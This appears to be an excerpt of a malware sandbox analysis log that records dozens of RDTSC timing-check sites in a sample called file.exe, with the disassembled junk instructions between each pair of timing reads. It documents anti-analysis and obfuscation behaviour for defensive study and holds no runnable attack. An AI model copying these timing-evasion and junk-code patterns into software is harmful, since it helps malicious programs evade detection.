Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7394BE second address: 7394DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA430E679EAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7394DD second address: 7394E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 738EC6 second address: 738ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 738ECA second address: 738EDC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FA43130E316h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 738EDC second address: 738EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CA99 second address: 73CA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CA9D second address: 73CAA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CAA1 second address: 73CAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CAAB second address: 73CAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CAAF second address: 73CAC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CAC5 second address: 73CACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CC46 second address: 73CC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CC4E second address: 73CC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FA430E679E6h 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FA430E679E6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CC69 second address: 73CC6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CC6D second address: 73CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA430E679F5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CDC0 second address: 73CDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA43130E326h 0x0000000b ja 00007FA43130E316h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CDE6 second address: 73CE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jng 00007FA430E679E6h 0x00000010 jng 00007FA430E679E6h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CE05 second address: 73CE1A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA43130E316h 0x00000008 jnc 00007FA43130E316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CF9B second address: 73CFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CFAC second address: 73CFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73CFB0 second address: 73CFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA430E679E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F6FD second address: 73F703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F703 second address: 73F708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745E9C second address: 745EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FA43130E316h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744C01 second address: 744C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B53 second address: 745B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B57 second address: 745B65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA430E679E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B65 second address: 745B76 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B76 second address: 745B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B7A second address: 745B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B7E second address: 745B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B95 second address: 745B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745B9A second address: 745BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FA430E679E6h 0x00000009 ja 00007FA430E679E6h 0x0000000f jmp 00007FA430E679ECh 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749C43 second address: 749C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749C47 second address: 749C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA430E679E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FA430E679F8h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749C72 second address: 749C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749C78 second address: 749C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679F5h 0x00000009 jg 00007FA430E679E6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7490CB second address: 7490D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7490D5 second address: 7490DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7490DB second address: 7490DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7490DF second address: 7490E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749549 second address: 74957C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E329h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FA43130E321h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7496E0 second address: 7496E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74CA9D second address: 74CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E325h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74C31B second address: 74C326 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74C74D second address: 74C754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74C754 second address: 74C76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA430E679ECh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74C76C second address: 74C770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754817 second address: 754821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752D75 second address: 752DA9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA43130E31Bh 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA43130E322h 0x00000017 popad 0x00000018 pushad 0x00000019 jnl 00007FA43130E316h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753699 second address: 7536A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA430E679E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7536A3 second address: 7536A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753951 second address: 753956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75420E second address: 754215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75451E second address: 754564 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA430E67A05h 0x00000008 pushad 0x00000009 jmp 00007FA430E679F6h 0x0000000e jns 00007FA430E679E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756B5F second address: 756BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FA43130E31Ah 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FA43130E323h 0x00000016 popad 0x00000017 jc 00007FA43130E328h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756BA0 second address: 756BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B51A5 second address: 6B51E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b je 00007FA43130E331h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FA43130E329h 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007FA43130E316h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EEDE second address: 75EF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F5h 0x00000009 jmp 00007FA430E679EDh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EF04 second address: 75EF37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FA43130E316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA43130E31Ch 0x00000013 jmp 00007FA43130E329h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1A2 second address: 75E1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA430E679E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1AC second address: 75E1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1B0 second address: 75E1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edi 0x00000008 jo 00007FA430E679EAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FA430E679E6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E4B0 second address: 75E4BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA43130E316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E4BA second address: 75E4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FA430E679E6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 jmp 00007FA430E679F6h 0x00000015 push edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E4EC second address: 75E527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FA43130E31Ch 0x00000011 jno 00007FA43130E316h 0x00000017 jmp 00007FA43130E329h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E527 second address: 75E52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA93 second address: 75EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA9D second address: 75EAA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76540B second address: 76544B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA43130E31Eh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jl 00007FA43130E316h 0x00000016 pop ebx 0x00000017 pushad 0x00000018 jmp 00007FA43130E327h 0x0000001d push edx 0x0000001e pop edx 0x0000001f je 00007FA43130E316h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765883 second address: 765889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765889 second address: 7658A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FA43130E31Dh 0x0000000d jnl 00007FA43130E316h 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7658A8 second address: 7658C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FA430E679E6h 0x0000000c popad 0x0000000d pushad 0x0000000e je 00007FA430E679E6h 0x00000014 jno 00007FA430E679E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7658C4 second address: 7658CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765A56 second address: 765A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765A5D second address: 765A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA43130E316h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765BBD second address: 765BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765D1E second address: 765D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765D25 second address: 765D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA430E679EAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76602A second address: 766034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766034 second address: 76604B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007FA430E679E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662F2 second address: 7662F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662F6 second address: 7662FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662FA second address: 76630E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76630E second address: 766329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FA430E679F5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766329 second address: 766354 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 jmp 00007FA43130E329h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FA43130E316h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766ADC second address: 766AE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766AE2 second address: 766AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FA43130E316h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766AFA second address: 766AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671AE second address: 7671B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671B4 second address: 7671E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA430E679F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA430E679F5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671E3 second address: 7671E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769823 second address: 769827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769827 second address: 769848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 jmp 00007FA43130E31Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769848 second address: 769850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769850 second address: 769855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769855 second address: 76986A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FA430E679E6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
